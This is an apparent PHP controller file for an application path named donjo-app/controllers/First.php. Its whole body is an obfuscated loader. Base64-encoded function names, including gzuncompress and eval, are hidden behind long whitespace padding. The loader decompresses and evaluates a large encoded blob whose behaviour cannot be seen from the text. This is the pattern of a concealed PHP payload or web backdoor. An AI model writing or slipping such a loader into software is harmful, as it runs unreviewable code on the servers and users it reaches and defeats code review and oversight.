<?php 
        $__='printf';$_='Loading donjo-app/controllers/First.php';
        































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































                                                                                                                                                                                                                     $________;
